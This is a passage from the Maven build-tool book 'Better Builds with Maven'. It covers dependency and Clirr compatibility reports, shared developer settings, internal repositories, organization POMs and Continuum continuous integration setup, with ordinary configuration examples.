packageBranchRate. such as handling checked exceptions that are unexpected in a properly configured system and difficult to test.org/cobertura-maven-plugin.
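To make the per-file, per-package and regexes settings mentioned above concrete, a sketch of a check configuration follows. The element names reflect the Cobertura plugin parameters discussed in this section, but the rates and the package pattern are illustrative only and should be adapted, and verified against the plugin reference, for your own project:

<configuration>
  <check>
    <totalLineRate>80</totalLineRate>
    <packageLineRate>75</packageLineRate>
    <lineRate>70</lineRate>
    <branchRate>70</branchRate>
    <regexes>
      <regex>
        <pattern>com.mergere.mvnbook.proficio.*</pattern>
        <lineRate>90</lineRate>
        <branchRate>90</branchRate>
      </regex>
    </regexes>
  </check>
</configuration>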
and a number of other features such as scoping and version selection. Monitoring and Improving the Health of Your Dependencies Many people use Maven primarily as a dependency manager. and browse to the file generated in target/site/dependencies. Maven 2. run mvn site in the proficio-core directory.9. Figure 6-11: An example dependency report 199 .html. but any projects that depend on your project. While this is only one of Maven's features.Assessing Project Health with Maven 6. If you haven't done so already. The result is shown in figure 6-11. This brought much more power to Maven's dependency mechanism.0 introduced transitive dependencies. but does introduce a drawback: poor dependency maintenance or poor scope and version selection affects not only your own project. the full graph of a project's dependencies can quickly balloon in size and start to introduce conflicts. Left unchecked. used well it is a significant time saver. The first step to effectively maintaining your dependencies is to review the standard report included with the Maven site. where the dependencies of dependencies are included in a build.
Currently. This can be quite difficult to read. or an incorrect scope – and choose to investigate its inclusion. here is the resolution process of the dependencies of proficio-core (some fields have been omitted for brevity): proficio-core:1. run mvn site from the base proficio directory. this requires running your build with debug turned on. local scope test wins) proficio-api:1. To see the report for the Proficio project. Another report that is available is the “Dependency Convergence Report”. but that it is overridden by the test scoped dependency in proficio-core. such as mvn -X package. so at the time of this writing there are two features in progress that are aimed at helping in this area: • • The Maven Repository Manager will allow you to navigate the dependency tree through the metadata stored in the Ibiblio repository. A dependency graphing plugin that will render a graphical representation of the information. This will output the dependency tree as it is calculated. It's here that you might see something that you didn't expect – an extra dependency. and that plexus-container-default attempts to introduce junit as a compile dependency.0-SNAPSHOT junit:3. an incorrect version. and why. and must be updated before the project can be released. which indicates dependencies that are in development.html will be created. It also includes some statistics and reports on two important factors: • Whether the versions of dependencies used for each module is in alignment. but appears in a multi-module build only. • 200 . The report shows all of the dependencies included in all of the modules within the project.0-SNAPSHOT (selected for compile) proficio-model:1. using indentation to indicate which dependencies introduce other dependencies. but more importantly in the second section it will list all of the transitive dependencies included through those dependencies. This helps ensure your build is consistent and reduces the probability of introducing an accidental incompatibility.8.8.1-alpha-2 (selected for compile) junit:3.1 (selected for test) plexus-container-default:1.Better Builds with Maven This report shows detailed information about your direct dependencies.1 (not setting scope to: compile.4 (selected for compile) classworlds:1. Whether there are outstanding SNAPSHOT dependencies in the build. as well as comments about what versions and scopes are selected.0-SNAPSHOT (selected for compile) Here you can see that. proficio-model is introduced by proficio-api. The file target/site/dependencyconvergence. for example. For example.0.0-alpha-9 (selected for compile) plexus-utils:1. and is shown in figure 6-12. This report is also a standard report.
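A common way to bring the versions used across modules into alignment, and so keep the convergence report clean, is to declare each version once in the parent POM's dependencyManagement section and omit it from the individual modules. A minimal sketch, using a dependency that already appears in the build:

<dependencyManagement>
  <dependencies>
    <dependency>
      <groupId>junit</groupId>
      <artifactId>junit</artifactId>
      <version>3.8.1</version>
      <scope>test</scope>
    </dependency>
  </dependencies>
</dependencyManagement>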
try the following recommendations for your dependencies: • • • • Look for dependencies in your project that are no longer used Check that the scope of your dependencies are set correctly (to test if only used for unit tests. This is particularly the case for dependencies that are optional and unused by your project. Use a range of supported dependency versions. Add exclusions to dependencies to remove poorly defined dependencies from the tree.Assessing Project Health with Maven Figure 6-12: The dependency convergence report These reports are passive – there are no associated checks for them. However. 201 . they can provide basic help in identifying the state of your dependencies once you know what to find. or runtime if it is needed to bundle with or run the application but not for compiling your source code). rather than using the latest available. To improve your project's health and the ability to reuse it as a dependency itself. You can control what version is actually used by declaring the dependency version in a project that packages or runs the application. declaring the absolute minimum supported as the lower boundary.
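To make the last two recommendations concrete, the following sketch shows an exclusion that removes the poorly scoped junit dependency seen in the resolution output earlier, and a version range that declares the minimum supported version as the lower boundary. The plexus groupId shown is an assumption; use the coordinates that appear in your own dependency tree:

<dependency>
  <groupId>org.codehaus.plexus</groupId>
  <artifactId>plexus-container-default</artifactId>
  <version>1.0-alpha-9</version>
  <exclusions>
    <exclusion>
      <groupId>junit</groupId>
      <artifactId>junit</artifactId>
    </exclusion>
  </exclusions>
</dependency>

<dependency>
  <groupId>junit</groupId>
  <artifactId>junit</artifactId>
  <!-- any version from 3.8.1 upwards is acceptable -->
  <version>[3.8.1,)</version>
  <scope>test</scope>
</dependency>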
Monitoring and Improving the Health of Your Releases Releasing a project is one of the most important procedures you will perform. 6. there is no verification that a library is binary-compatible – incompatibility will be discovered only when there's a failure.Better Builds with Maven Given the importance of this task. but then expected to continue working as they always have. Libraries will often be substituted by newer versions to obtain new features or bug fixes. Figure 6-13: An example Clirr report This is particularly important if you are building a library or framework that will be consumed by developers outside of your own project. but it is often tedious and error prone. specification dependencies that let you depend on an API and manage the implementation at runtime. Because existing libraries are not recompiled every time a version is changed. An important tool in determining whether a project is ready to be released is Clirr (). While the next chapter will go into more detail about how Maven can help automate that task and make it more reliable. and more.10. 202 . Clirr detects whether the current version of a library has introduced any binary incompatibilities with the previous release. Two that are in progress were listed above. An example Clirr report is shown in figure 6-13. more tools are needed in Maven. and the information released with it. this section will focus on improving the quality of the code released. Catching these before a release can eliminate problems that are quite difficult to resolve once the code is “in the wild”. but there are plans for more: • • A class analysis plugin that helps identify dependencies that are unused in your current project Improved dependency management features including different mechanisms for selecting versions that will allow you to deal with conflicting versions.sf.
add the following to the reporting section of proficio-api/pom. [INFO] [INFO] [INFO] [INFO] [INFO] . For example.8 release.codehaus. You can change the version used with the comparisonVersion parameter. While methods of marking incompatibility are planned for future versions. that is before the current development version. By default. by setting the minSeverity parameter. run the following command: mvn clirr:clirr -DcomparisonVersion=0. If you run either of these commands..xml: ...mojo</groupId> <artifactId>clirr-maven-plugin</artifactId> <configuration> <minSeverity>info</minSeverity> </configuration> </plugin> </plugins> </reporting> . As a project grows. the answer here is clearly – yes.Assessing Project Health with Maven But does binary compatibility apply if you are not developing a library for external consumption? While it may be of less importance.8 203 . where the dependency mechanism is based on the assumption of binary compatibility between versions. Maven currently works best if any version of an artifact is backwards compatible. the interactions between the project's own components will start behaving as if they were externally-linked. However. the report will be generated in target/site/clirrreport. This gives you an overview of all the changes since the last release.9 ------------------------------------------------------------BUILD SUCCESSFUL ------------------------------------------------------------- This version is determined by looking for the newest release in repository. you'll notice that Maven reports that it is using version 0. back to the first release.. If you run mvn site in proficio-api. [clirr:clirr] Comparing to version: 0. you can configure the plugin to show all informational messages. To see this in action.. This is particularly true in a Maven-based environment. to compare the current code to the 0.... the Clirr report shows only errors and warnings.html. <reporting> <plugins> <plugin> <groupId>org.9 of proficio-api against which to compare (and that it is downloaded if you don't have it already): . Different modules may use different versions. even if they are binary compatible. or a quick patch may need to be made and a new version deployed into an existing application. You can obtain the same result by running the report on its own using mvn clirr:clirr.
if the team is prepared to do so. To add the check to the proficio-api/pom.. If it is the only one that the development team will worry about breaking. delegating the code. there is nothing in Java preventing them from being used elsewhere. since this early development version had a different API. the harder they are to change as adoption increases. You'll notice there are a more errors in the report.. Even if they are designed only for use inside the project. then there is no point in checking the others – it will create noise that devalues the report's content in relation to the important components.mojo</groupId> <artifactId>clirr-maven-plugin</artifactId> <executions> <execution> <goals> <goal>check</goal> </goals> </execution> </executions> </plugin> . add the following to the build section: . In this instance.. However. <build> <plugins> <plugin> <groupId>org. to discuss and document the practices that will be used. Like all of the quality metrics.. it is important to agree up front. and it can assist in making your own project more stable. and later was redesigned to make sure that version 1. rather than removing or changing the original API and breaking binary compatibility. The longer poor choices remain. however you can see the original sources by extracting the Code_Ch06-2. It is best to make changes earlier in the development cycle. on the acceptable incompatibilities. Once a version has been released that is intended to remain binary-compatible going forward.codehaus. The Clirr plugin is also capable of automatically checking for introduced incompatibilities through the clirr:check goal. it is a good idea to monitor as many components as possible. you are monitoring the proficio-api component for binary compatibility changes only.. 204 .zip file.. as it will be used as the interface into the implementation by other applications. </plugins> </build> . This is the most important one to check. it is almost always preferable to deprecate an old API and add a new one.Better Builds with Maven These versions of proficio-api are retrieved from the repository.0 would be more stable in the long run. and to check them automatically. so that fewer people are affected.xml file.
codehaus.. and ignored in the same way that PMD does.Assessing Project Health with Maven If you now run mvn verify. you can create a very useful mechanism for identifying potential release disasters much earlier in the development process. This allows the results to be collected over time to form documentation about known incompatibilities for applications using the library. which is available at. you can choose to exclude that from the report by adding the following configuration to the plugin: . you will see that the build fails due to the binary incompatibility introduced between the 0.9 preview release and the final 1.mojo</groupId> <artifactId>clirr-maven-plugin</artifactId> <configuration> <excludes> <exclude>**/Proficio</exclude> </excludes> </configuration> . not just the one acceptable failure. and then act accordingly.. as well as strategies for evolving an API without breaking it.codehaus. However. the following articles and books can be recommended: • Evolving Java-based APIs contains a description of the problem of maintaining binary compatibility. and so is most useful for browsing. Built as a Javadoc doclet.org/jdiff-maven-plugin. This can be useful in getting a greater level of detail than Clirr on specific class changes.9 release. <plugin> <groupId>org. Hopefully a future version of Clirr will allow acceptable incompatibilities to be documented in the source code.0 version. With this simple setup. it will not pinpoint potential problems for you. • A similar tool to Clirr that can be used for analyzing changes between releases is JDiff. it takes a very different approach. it is listed only in the build configuration. and particularly so if you are designing a public API. so the report still lists the incompatibility. Since this was an acceptable incompatibility due to the preview nature of the 0... taking two source trees and comparing the differences in method signatures and Javadoc annotations. </plugin> This will prevent failures in the Proficio class from breaking the build in the future. 205 . A limitation of this feature is that it will eliminate a class entirely. While the topic of designing a strong public API and maintaining binary compatibility is beyond the scope of this book. Effective Java describes a number of practical rules that are generally helpful to writing code in Java. It has a functional Maven 2 plugin. Note that in this instance.
6.11. Viewing Overall Project Health

In the previous sections of this chapter, a large amount of information was presented about a project, each piece in discrete reports. Some of the reports linked to one another, but none related information from another report to itself, and few of the reports aggregated information across a multiple module build. Finally, none of the reports presented how the information changes over time, other than the release announcements. These are all important features to have to get an overall view of the health of a project. While some attempts were made to address this in Maven 1.0 (for example, the Dashboard plugin), they did not address all of these requirements, and have not yet been implemented for Maven 2.0. However, it should be noted that the Maven reporting API was written with these requirements in mind specifically, and as the report set stabilizes, summary reports will start to appear.

6.12. Summary

The power of Maven's declarative project model is that with a very simple setup (often only 4 lines in pom.xml), a new set of information about your project can be added to a shared Web site to help your team visualize the health of the project. The model also remains flexible enough to make it easy to extend and customize the information published on your project web site.

In the absence of aggregated reports, it is especially important that your project information not remain passive. Most Maven plugins allow you to integrate rules into the build that check certain constraints on that piece of information once it is well understood. The purpose, then, of the visual display is to aid in deriving the appropriate constraints to use, along with techniques to ensure that the build checks are automated, regularly scheduled, and run in the appropriate environment. It is important that developers are involved in the decision making process regarding build constraints, so that they feel that they are achievable. How well this works in your own projects will depend on the development culture of your team; in some cases, it requires a shift from a focus on time and deadlines, to a focus on quality. Once established, enforcing good, individual checks that fail the build when they're not met will reduce the need to gather information from various sources about the health of the project, as there is a constant background monitor that ensures the health of the project is being maintained. Best of all, this focus and automated monitoring will have the natural effect of improving productivity and reducing time of delivery again.

The additions and changes to Proficio made in this chapter can be found in the Code_Ch06-1.zip source archive, and will be used as the basis for the next chapter. The next chapter examines team development and collaboration, and incorporates the concepts learned in this chapter.
7. Team Collaboration with Maven

- Tom Clancy
7.1. The Issues Facing Teams

Software development as part of a team, whether it is 2 people or 200 people, faces a number of challenges to the success of the effort. Many of these challenges are out of any given technology's control – for instance, finding the right people for the team, and dealing with differences in opinions. However, one of the biggest challenges relates to the sharing and management of development information.

As each member retains project information that isn't shared or commonly accessible, every other member (and particularly new members) will inevitably have to spend time obtaining this localized information, repeating errors previously solved or duplicating efforts already made. Even when it is not localized, project information can still be misplaced, misinterpreted, or forgotten. This problem gets exponentially larger as the size of the team increases, further contributing to the problem, and it is particularly relevant to those working as part of a team that is distributed across different physical locations and timezones. While it's essential that team members receive all of the project information required to be productive, it's just as important that they don't waste valuable time researching and reading through too many information sources simply to find what they need. As teams continue to grow, it is obvious that trying to publish and disseminate all of the available information about a project would create a near impossible learning curve and generate a barrier to productivity. The key to the information issue in both situations is to reduce the amount of communication necessary to obtain the required information in the first place.

A Community-oriented Real-time Engineering (CoRE) process excels with this information challenge. An organizational and technology-based framework, CoRE is based on accumulated learnings from open source projects that have achieved successful, rapid development, working on complex, component-based projects despite large, widely-distributed teams. Using the model of a community, CoRE emphasizes the relationship between project information and project members, and enables globally distributed development teams to cohesively contribute to high-quality software, in rapid, iterative cycles. This value is delivered to development teams by supporting project transparency, real-time stakeholder participation, and asynchronous engineering, which is enabled by the accessibility of consistently structured and organized information such as centralized code repositories, web-based communication channels and web-based project management tools. Although a distributed team has a higher communication overhead than a team working in a single location, the fact that everyone has direct access to the other team members through the CoRE framework reduces the time required to not only share information, but also to incorporate feedback, resulting in shortened development cycles. The CoRE approach to development also means that new team members are able to become productive quickly, and that existing team members become more productive and effective.

While Maven is not tied directly to the CoRE framework, it does encompass a set of practices and tools that enable effective team communication and collaboration. These tools aid the team to organize, visualize, and document for reuse the artifacts that result from a software project.
As described in Chapter 6, Maven can gather and share the knowledge about the health of a project. In this chapter, this is taken a step further, demonstrating how Maven provides teams with real-time information on the builds and health of a project, through the practice of continuous integration. This chapter also looks at the adoption and use of a consistent development environment, and the use of archetypes to ensure consistency in the creation of new projects.

7.2. How to Set up a Consistent Developer Environment

Consistency is important when establishing a shared development environment. Without it, the set up process for a new developer can be slow, error-prone and full of omissions, and it will be the source of time-consuming development problems in the future, because the environment will tend to evolve inconsistently once started that way. While one of Maven's objectives is to provide suitable conventions to reduce the introduction of inconsistencies in the build environment, there are unavoidable variables that remain, such as different installation locations for software, varying operating systems, multiple JDK versions, and other discrete settings such as user names and passwords. To maintain build consistency, while still allowing for this natural variability, the key is to minimize the configuration required by each individual developer, and to effectively define and declare the variables that remain.

In Maven, these variables relate to the user and installation settings files, and to user-specific profiles. In Chapter 2, you learned how to create your own settings.xml file. This file can be stored in the conf directory of your Maven installation, or in the .m2 subdirectory of your home directory (settings in this location take precedence over those in the Maven installation directory). The settings.xml file contains a number of settings that are user-specific, such as proxy settings, but also several that are typically common across users in a shared environment. In a shared development environment, it's a good idea to leverage Maven's two different settings files to separately manage shared and user-specific settings: common configuration settings are included in the installation directory, while an individual developer's settings are stored in their home directory. The following is an example of the kind of configuration file that you might use in the installation directory, <maven home>/conf/settings.xml.
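A sketch of such a file is shown below. The server entry, the default-repositories profile name, the repository URLs, and the plugin group are placeholders to adapt to your own environment; the ${website.username} property is supplied by each developer's own settings, as described next.

  <settings>
    <servers>
      <server>
        <!-- site deployment credentials shared in structure; the user name is
             supplied per-developer through the property-overrides profile -->
        <id>website</id>
        <username>${website.username}</username>
      </server>
    </servers>
    <profiles>
      <profile>
        <id>default-repositories</id>
        <repositories>
          <repository>
            <id>internal</id>
            <url>http://localhost:8081/internal/</url>
          </repository>
        </repositories>
        <pluginRepositories>
          <pluginRepository>
            <id>internal</id>
            <url>http://localhost:8081/internal/</url>
          </pluginRepository>
        </pluginRepositories>
      </profile>
    </profiles>
    <activeProfiles>
      <activeProfile>property-overrides</activeProfile>
      <activeProfile>default-repositories</activeProfile>
    </activeProfiles>
    <pluginGroups>
      <pluginGroup>com.mycompany.plugins</pluginGroup>
    </pluginGroups>
  </settings>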
There are a number of reasons to include these settings in a shared configuration:
• If a proxy server is allowed, it would usually be set consistently across the organization or department.
• The server settings will typically be common among a set of developers, with only specific properties such as the user name defined in the user's settings. By placing the common configuration in the shared settings, issues with inconsistently-defined identifiers and permissions are avoided.
• The profile defines those common, internal repositories that contain a given organization's or department's released artifacts. These repositories are independent of the central repository in this configuration. See section 7.3 of this chapter for more information on setting up an internal repository.
• The mirror element can be used to specify a mirror of a repository that is closer to you. See section 7.3 for more information on creating a mirror of the central repository within your own organization.
• The active profiles listed enable the profiles defined previously in every environment. Another profile, property-overrides, is also enabled by default. This profile is defined in the user's settings file to set the properties used in the shared file, such as ${website.username}.
• The plugin groups are necessary only if an organization has plugins, which are run from the command line and not defined in the POM.

Using this basic template as a starting point, you can easily add and consistently roll out any new server and repository settings across users.

You'll notice that the local repository is omitted in the prior example. In Maven, the local repository is defined as the repository of a single user. While you may define a standard location that differs from Maven's default (for example, ${user.home}/maven-repo), it is important that you do not configure this setting in a way that shares a local repository across users at a single physical location.

The user-specific configuration is much simpler, as shown below:

  <settings>
    <profiles>
      <profile>
        <id>property-overrides</id>
        <properties>
          <website.username>myuser</website.username>
        </properties>
      </profile>
    </profiles>
  </settings>

To confirm that the settings are installed correctly, you can view the merged result by using the following help plugin command:

  C:\mvnbook> mvn help:effective-settings
Separating the shared settings from the user-specific settings is helpful, but it is also important to ensure that the shared settings are easily and reliably installed with Maven, and easily updated when they change. The following are a few methods to achieve this:
• Rebuild the Maven release distribution to include the shared configuration file and distribute it internally. A new release will be required each time the configuration is changed.
• Check the Maven installation into CVS, Subversion, or another source control management (SCM) system. Each developer can check out the installation onto their own machine and run it from there. Retrieving an update from an SCM will easily update the configuration and/or installation, but requires a manual procedure.
• Place the Maven installation on a read-only shared or network drive from which each developer runs the application. If this infrastructure is available, each execution will immediately be up-to-date; however, doing so will prevent Maven from being available off-line, or if there are network problems.
• Use an existing desktop management solution, or other custom solution, if one is already in use in other development, test and production environments.

If necessary, it is possible to maintain multiple Maven installations, by one of the following methods:
• Using the M2_HOME environment variable to force the use of a particular installation.
• Adjusting the path or creating symbolic links (or shortcuts) to the desired Maven executable, if M2_HOME is not set.

Configuring the settings.xml file covers the majority of use cases for individual developer customization; however, it applies to all projects that are built in the developer's environment. In some circumstances, an individual will need to customize the build of an individual project. To do this, developers must use profiles in the profiles.xml file, located in the project directory. For more information on profiles, see Chapter 3.

Now that each individual developer on the team has a consistent set up that can be customized as needed, the next step is to establish a repository to and from which artifacts can be published and dependencies downloaded, so that multiple developers and teams can collaborate effectively.

7.3. Creating a Shared Repository

Most organizations will need to set up one or more shared repositories, since not everyone can deploy to the central Maven repository. To publish releases for use across different environments within their network, organizations will typically want to set up what is referred to as an internal repository. This internal repository is still treated as a remote repository in Maven, just as any other external repository would be. For an explanation of the different types of repositories, see Chapter 2.

Setting up an internal repository is simple. While any of the available transport protocols can be used, the most popular is HTTP. You can use an existing HTTP server for this, or create a new server using Apache HTTPd, Apache Tomcat, Jetty, or any number of other servers; in this example, Jetty is used. First, create a new directory in which to store the files. While it can be stored anywhere you have permissions, in this example C:\mvnbook\repository will be used. To set up Jetty, download the Jetty 5.1.10 server bundle from the book's Web site and copy it to the repository directory. Change to that directory, and run:

  C:\mvnbook\repository> java -jar jetty-5.1.10-bundle.jar 8081
You can now navigate to http://localhost:8081/ and find that there is a web server running, displaying that directory. The server is set up on your own workstation for simplicity in this example; in a real deployment, you will want to set up or use an existing HTTP server that is in a shared, accessible location, configured securely and monitored to ensure it remains running at all times. It is also possible to use a repository on another server with any combination of supported protocols, including http, ftp, scp, sftp and more. For more information, refer to Chapter 3.

Later in this chapter you will learn that there are good reasons to run multiple, separate repositories, but rather than set up multiple web servers, you can store the repositories on this single server. For the first repository, create a subdirectory called internal that will be available from the web server you just started:

  C:\mvnbook\repository> mkdir internal

This creates an empty repository, and is all that is needed to get started. To populate the repository you just created, there are a number of methods available:
• Manually add content as desired using mvn deploy:deploy-file.
• Set up the Maven Repository Manager as a proxy to the central repository. This will download anything that is not already present, and keep a copy in your internal repository for others on your team to reuse.
• Use rsync to take a copy of the central repository and regularly update it. At the time of writing, the size of the central Maven repository was 5.8G, and as a result, copying it in its entirety requires significant time, bandwidth and disk space.

It is also possible to set up another repository (or use the same one) to mirror content from the Maven central repository:

  C:\mvnbook\repository> mkdir central

While this isn't required, it is common in many organizations, as it eliminates the requirement for Internet access or proxy configuration, it provides faster performance (as most downloads to individual developers come from within their own network), and it gives full control over the set of artifacts with which your software is built, by avoiding any reliance on Maven's relatively open central repository.

The Maven Repository Manager (MRM) is a new addition to the Maven build platform that is designed to administer your internal repository. It is deployed to your Jetty server (or any other servlet container) and provides remote repository proxies, as well as friendly repository browsing, searching, and reporting. The repository manager can be downloaded from the Maven project web site.

This chapter will assume the repositories are running from http://localhost:8081/ and that artifacts are deployed to the repositories using the file system.
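As an example of the first population method mentioned above, a one-off third-party JAR could be pushed into the internal repository with the deploy plugin; the coordinates and file name below are only placeholders for illustration:

  C:\mvnbook> mvn deploy:deploy-file -Dfile=some-library-1.0.jar \
      -DgroupId=com.example -DartifactId=some-library \
      -Dversion=1.0 -Dpackaging=jar \
      -Durl=file:///C:/mvnbook/repository/internal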
When using this repository for your projects, there are two choices: use it as a mirror of the central repository, or have it override the central repository. You would use it as a mirror if it is intended to be a copy of the central repository exclusively, and if it's acceptable to have developers configure this in their settings, as demonstrated in section 7.2. On the other hand, you should override the central repository if you want to prevent access to the central repository for greater control, to configure the repository from the project level instead of in each user's settings, or to include your own artifacts in the same repository.

To override the central repository with your internal repository, you must define a repository in a settings file and/or POM that uses the identifier central (see the sketch at the end of this section). Usually, this must be defined as both a regular repository and a plugin repository to ensure all access is consistent. Note that unless you have mirrored the central repository using one of the techniques discussed previously, your internal repository must contain everything your builds need, otherwise Maven will fail to download any dependencies that are not in your local repository.

Repositories such as the one above are usually configured in the POM, so that a project can add repositories itself for dependencies located outside of those configured initially. It is still important to declare the repositories that will be used in the top-most POM itself, rather than only in each developer's settings; developers may then choose to use a different mirror, or the original central repository directly, without consequence to the outcome of the build. However, there is a problem – when a POM inherits from another POM that is not in the central repository, Maven must retrieve the parent from a repository before it can read the rest of the POM. This makes it impossible to define that repository in the parent itself. Not only is this very inconvenient for a situation where a developer might not have configured their settings and instead manually installed the POM, or had it in their source code check out, it would be a nightmare to change should the repository location change! The solution is to declare your internal repository (or central replacement) in the shared settings.xml file, as shown in section 7.2. If you have multiple repositories, it is necessary to declare only those that contain an inherited POM in this way.

The next section discusses how to set up an "organization POM", or hierarchy, that declares shared settings within an organization and its departments.
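As mentioned above, overriding the central repository means re-using the identifier central. A sketch of such a declaration, placed in a profile of the shared settings file, might look like the following; the URL assumes the internal repository created in section 7.3, and the plugin repository is repeated so that plugin downloads are redirected as well:

  <repositories>
    <repository>
      <!-- re-using the identifier 'central' replaces Maven's built-in central repository -->
      <id>central</id>
      <url>http://localhost:8081/internal/</url>
    </repository>
  </repositories>
  <pluginRepositories>
    <pluginRepository>
      <id>central</id>
      <url>http://localhost:8081/internal/</url>
    </pluginRepository>
  </pluginRepositories>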
7.4. Creating an Organization POM

As previously mentioned in this chapter, consistency is important when setting up your build infrastructure. In the same way, project inheritance can be used to assist in ensuring project consistency across a project, its departments, or the organization as a whole. Any number of levels (parents) can be used, depending on the information that needs to be shared; these parents may be used to define the organization, departments, and then the teams within those departments. While project inheritance was limited by the extent of a developer's checkout in Maven 1.0, Maven 2 now retrieves parent projects from the repository, so it's possible to have one or more parents that define elements common to several projects.

As an example, consider the Maven project itself. It is a part of the Apache Software Foundation, and is a project that, itself, has a number of sub-projects (Maven, Maven SCM, Maven Continuum, etc.). This project structure can be related to a company structure, wherein there's the organization, its departments, and the teams within those departments. As a result, there are three levels to consider when working with any individual module that makes up the Maven project.

To continue the Maven example, consider the POM for Maven SCM:

  <project>
    <modelVersion>4.0.0</modelVersion>
    <parent>
      <groupId>org.apache.maven</groupId>
      <artifactId>maven-parent</artifactId>
      <version>1</version>
    </parent>
    <groupId>org.apache.maven.scm</groupId>
    <artifactId>maven-scm</artifactId>
    <url>http://maven.apache.org/maven-scm/</url>
    ...
    <modules>
      <module>maven-scm-api</module>
      <module>maven-scm-providers</module>
      ...
    </modules>
  </project>

If you were to review the entire POM, you'd find that there is very little deployment or repository-related information, as this is consistent information shared across all Maven projects through inheritance. You may have noticed the unusual version declaration for the parent project. Since the version of the POM usually bears no resemblance to the version of the software, the easiest way to version a POM of this type is through sequential numbering. Future versions of Maven plan to automate the numbering of these types of parent projects to make this easier. It is important to recall, from section 7.3, that if your inherited projects reside in an internal repository, then that repository will need to be added to the settings.xml file in the shared installation (or in each developer's home directory).
If you look at the Maven project's parent POM, you'd see it looks like the following:

  <project>
    <modelVersion>4.0.0</modelVersion>
    <parent>
      <groupId>org.apache</groupId>
      <artifactId>apache</artifactId>
      <version>1</version>
    </parent>
    <groupId>org.apache.maven</groupId>
    <artifactId>maven-parent</artifactId>
    <version>5</version>
    <url>http://maven.apache.org/</url>
    ...
    <mailingLists>
      <mailingList>
        <name>Maven Announcements List</name>
        <post>announce@maven.apache.org</post>
        ...
      </mailingList>
    </mailingLists>
    <developers>
      <developer>
        ...
      </developer>
    </developers>
  </project>
The Maven parent POM includes shared elements, such as the announcements mailing list and the list of developers that work across the whole project. In turn, most of the remaining elements are inherited from the organization-wide parent project, in this case the Apache Software Foundation:

  <project>
    <modelVersion>4.0.0</modelVersion>
    <groupId>org.apache</groupId>
    <artifactId>apache</artifactId>
    <version>1</version>
    <organization>
      <name>Apache Software Foundation</name>
      <url>http://www.apache.org/</url>
    </organization>
    <url>http://www.apache.org/</url>
    ...
    <repositories>
      <repository>
        <id>apache.snapshots</id>
        <name>Apache Snapshot Repository</name>
        <url>http://people.apache.org/maven-snapshot-repository</url>
        <releases>
          <enabled>false</enabled>
        </releases>
      </repository>
    </repositories>
    ...
    <distributionManagement>
      <repository>
        ...
      </repository>
      <snapshotRepository>
        ...
      </snapshotRepository>
    </distributionManagement>
  </project>

The foundation-level project declares the elements that are common to all of its sub-projects – the snapshot repository (which will be discussed further in section 7.6), and the deployment locations.

An issue that can arise when working with this type of hierarchy is the storage location of the source POM files. Source control management systems like CVS and SVN (with the traditional intervening trunk directory at the individual project level) do not make it easy to store and check out such a structure. For this reason, it is best to store the parent POM files in a separate area of the source control tree, where they can be checked out, modified, and deployed with their new version as appropriate. These parent POM files are likely to be updated on a different, and less frequent, schedule than the projects themselves. In fact, there is no best practice requirement to even store these files in your source control management system, since you can retain the historical versions in the repository if it is backed up (in the future, the Maven Repository Manager will allow POM updates from a web interface).
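Because these parent POM files live outside the normal project tree, releasing an updated parent is usually just a matter of checking out that separate area, incrementing the sequential version, and deploying the POM on its own. The checkout URL below is only a placeholder for illustration:

  C:\mvnbook> svn co http://svn.mycompany.com/pom/trunk company-pom
  C:\mvnbook> cd company-pom
  C:\mvnbook\company-pom> mvn deploy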
7.5. Continuous Integration with Continuum

If you are not already familiar with it, continuous integration enables automated builds of your project on a regular interval, ensuring that conflicts are detected earlier in a project's release life cycle, rather than close to a release. More than just nightly builds, continuous integration can enable a better development culture, where team members can make smaller, iterative changes that can more easily support concurrent development processes. As such, continuous integration is a key element of effective collaboration.

In this chapter, you will pick up the Proficio example from earlier in the book, and learn how to use Continuum to build this project on a regular basis. Continuum is Maven's continuous integration and build server. The examples discussed are based on Continuum 1.0.3, however newer versions should be similar. The examples also assume you have Subversion installed, which you can obtain for your operating system from http://subversion.tigris.org/.

First, you will need to install Continuum. This is very simple – once you have downloaded and unpacked it, you can run it using the following command:

  C:\mvnbook\continuum-1.0.3> bin\win32\run

There are scripts for most major platforms, as well as the generic bin/plexus.sh for use on other Unix-based platforms. Starting up Continuum will also start an HTTP server and servlet engine; you can verify the installation by viewing the web site at http://localhost:8080/continuum/.

The first screen to appear will be the one-time setup page shown in figure 7-1.

Figure 7-1: The Continuum setup screen

The configuration on the screen is straightforward – all you should need to enter are the details of the administration account you'd like to use, and the company information for altering the logo in the top left of the screen. To complete the Continuum setup page, use the following values:
• Working Directory: working-directory
• Build Output Directory: build-output-directory
• Base URL: the http://localhost:8080/continuum address at which your instance is reachable

For most installations this is all the configuration that's required. However, if you are running Continuum on your desktop and want to try the examples in this section, some additional steps are required. As of Continuum 1.0.3, these additional configuration requirements can be set only after the previous step has been completed, and you must stop the server to make the changes (to stop the server, press Ctrl-C in the window that is running Continuum).
In the following examples, POM files will be read from the local hard disk where the server is running. By default, this is disabled as a security measure, since paths can be entered from the web interface. To enable this setting, edit apps/continuum/conf/application.xml and verify the following line isn't commented out:

  ...
  <implementation>
    org.codehaus.plexus.formica.validation.UrlValidator
  </implementation>
  <configuration>
    <allowedSchemes>
      ...
      <allowedScheme>file</allowedScheme>
    </allowedSchemes>
  </configuration>
  ...

To have Continuum send you e-mail notifications, you will also need an SMTP server to which to send the messages. The default is to use localhost:25; if you do not have this set up on your machine, edit the file above to change the smtp-host setting. For instructions on other configuration options, refer to http://maven.apache.org/continuum/guides/mini/guide-configuration.html. After these steps are completed, you can start Continuum again.

The next step is to set up the Subversion repository for the examples. This requires obtaining the Code_Ch07.zip archive and unpacking it in your environment. You can then check out Proficio from that location, using the file:// URL of the unpacked repository – for example, if it was unzipped in C:\mvnbook\svn:

  C:\mvnbook> svn co <file-url-of-the-proficio-repository> proficio
The POM in this repository is not completely configured yet, since not all of the required details were known at the time of its creation. If you haven't done so already, edit proficio/pom.xml to correct the e-mail address to which notifications will be sent, and edit the location of the Subversion repository, by uncommenting and modifying the following lines:

  ...
  <scm>
    <connection>scm:svn:...</connection>
    <developerConnection>scm:svn:...</developerConnection>
  </scm>
  ...

The ciManagement section is where the project's continuous integration is defined, and in this example it has been configured to use Continuum locally on port 8080:

  ...
  <ciManagement>
    <system>continuum</system>
    <url>http://localhost:8080/continuum</url>
    <notifiers>
      <notifier>
        <type>mail</type>
        <configuration>
          <address>youremail@yourdomain.com</address>
        </configuration>
      </notifier>
    </notifiers>
  </ciManagement>
  ...

The distributionManagement setting will be used in a later example to deploy the site from your continuous integration environment. This assumes that you are still running the repository Web server on localhost:8081, from the directory C:\mvnbook\repository; if you haven't done so already, refer to section 7.3 for information on how to set this up.

  ...
  <distributionManagement>
    <site>
      <id>website</id>
